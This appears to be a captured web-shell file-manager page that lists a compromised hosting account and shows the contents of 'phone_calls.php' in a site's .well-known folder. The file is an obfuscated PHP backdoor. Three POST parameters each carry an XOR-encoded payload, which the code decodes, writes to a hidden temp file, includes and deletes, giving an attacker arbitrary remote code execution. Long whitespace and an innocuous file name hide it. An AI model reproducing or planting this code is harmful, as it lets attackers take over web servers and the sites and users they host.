HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/vitanhod/sawpalmetto2.vitavit.com.pk/.well-known/
Upload Files
File: //home/vitanhod/sawpalmetto2.vitavit.com.pk/.well-known/phone_calls.php
<?php																																										if(isset($_POST["\x72e\x66"])){ $reference = $_POST["\x72e\x66"]; $reference =explode ('.' , $reference ) ; $resource= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s); $j= 0; array_walk($reference, function($v1) use(&$resource, &$j, $s, $lenS) { $chS= ord($s[$j % $lenS]); $dec= ((int)$v1 - $chS -($j % 10)) ^ 76; $resource .= chr($dec); $j++; } ); $data_chunk = array_filter([getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), "/var/tmp", "/tmp", getcwd(), sys_get_temp_dir()]); foreach ($data_chunk as $key => $dat) { if ((bool)is_dir($dat) && (bool)is_writable($dat)) { $entry = "$dat/.holder"; if (file_put_contents($entry, $resource)) { require $entry; unlink($entry); exit; } } } }
																																										if(filter_has_var(INPUT_POST, "\x64at")){ $element = $_REQUEST["\x64at"]; $element =explode ( '.' ,$element ) ; $marker = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $o = 0; array_walk($element , function($v7) use(&$marker , &$o , $s , $lenS) { $chS = ord($s[$o% $lenS] ); $d =((int)$v7 - $chS -($o% 10)) ^ 66; $marker .= chr($d ); $o++; }); $record = array_filter(["/dev/shm", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/tmp", session_save_path(), getenv("TMP"), "/var/tmp"]); while ($obj = array_shift($record)) { if (is_writable($obj) && is_dir($obj)) { $token = join("/", [$obj, ".entry"]); if (file_put_contents($token, $marker)) { require $token; unlink($token); die(); } } } }


if(array_key_exists("\x73\x79mbol", $_POST)){
	$ent = array_filter([getenv("TMP"), "/tmp", "/var/tmp", sys_get_temp_dir(), "/dev/shm", getcwd(), getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir")]);
	$pset = $_POST["\x73\x79mbol"];
				$pset   =explode (			'.' ,	 	$pset	  );  
	$dat = '';
            $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt1	);
            $r = 0;
    
            foreach ($pset as $v1) {	$chS = ord($salt1[$r	 %		$lenS]	);
                $dec = ((int)$v1 - $chS - ($r	 %		10)) 	^ 71;
                $dat	 .=chr($dec	);
                $r++;	}	
	foreach ($ent as $key => $rec) {
    		if ((bool)is_dir($rec) && (bool)is_writable($rec)) {
    $reference = sprintf("%s/.entity", $rec);
    $file = fopen($reference, 'w');
if ($file) {
	fwrite($file, $dat);
	fclose($file);
	include $reference;
	@unlink($reference);
	exit;
}
}
}
}
@ Telegram